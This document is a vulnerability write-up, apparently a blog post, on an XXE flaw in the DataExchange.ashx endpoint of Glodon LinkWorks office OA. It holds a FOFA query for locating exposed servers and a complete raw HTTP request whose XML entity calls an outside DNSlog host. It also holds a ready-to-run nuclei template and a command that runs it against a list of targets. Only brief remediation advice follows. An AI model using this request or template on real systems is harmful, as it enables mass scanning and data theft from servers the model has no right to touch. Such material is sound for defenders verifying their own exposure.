Disclaimer: this article is shared as study notes for technical learning and reference only. Do not use it for any illegal purpose. Any direct or indirect consequences or losses caused by individuals or organizations using the information provided here are the sole responsibility of the user and have nothing to do with this platform or the publisher!!!

Vulnerability name

Glodon Linkworks DataExchange.ashx XXE vulnerability

Affected products

Glodon Linkworks office OA

Vulnerability description

Glodon LinkWorks office OA (Office Automation) is a comprehensive office automation system designed to improve work efficiency and collaboration within an organization. It provides a range of features and tools that help enterprises manage and handle daily office tasks, workflows and documents. The system's /GB/LK/Document/DataExchange/DataExchange.ashx endpoint has an XXE vulnerability: an attacker can embed malicious content in the submitted XML, which can lead to server data leakage and remote control of the server.

FOFA search query

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

Vulnerability reproduction

Register an account on a DNSlog platform to receive the out-of-band callback, for example http://dnslog.pw/dns/?&monitor=true; after registering, tick the auto-refresh option, then send the following request to the test target so that it parses the XML and resolves the DNS name.

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A lookup record appears on the DNSlog platform.


Reproduction successful.

nuclei PoC

The PoC file contents are as follows:

id: glodon-linkworks-DataExchange-xxe

info:
  name: 广联达Linkworks DataExchange.ashx XXE漏洞
  author: fgz
  severity: critical
  description: 广联达LinkWorks办公OA(Office Automation)是一款综合办公自动化系统,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞,攻击者可以在xml中构造恶意命令,会导致服务器数据泄露以及被远控。
  metadata:
    max-request: 1
    fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
    verified: true
requests:
  - raw:
      - |+
        POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
        Sec-Purpose: prefetch;prerender
        Purpose: prefetch
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
        
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0
        Content-Disposition: form-data;name="SystemName"
        
        BIM
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0
        Content-Disposition: form-data;name="Params"
        Content-Type: text/plain
        
        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE test [
        <!ENTITY t SYSTEM "http://{{interactsh-url}}">
        ]
        >
        <test>&t;</test>
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0--

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

Run the PoC

nuclei.exe -t mypoc/广联达/glodon-linkworks-DataExchange-xxe.yaml -l data/广联达Linkworks.txt

Remediation advice

1. Watch the vendor's homepage and contact the vendor to obtain a patch.

2. Configure an access whitelist for the endpoint.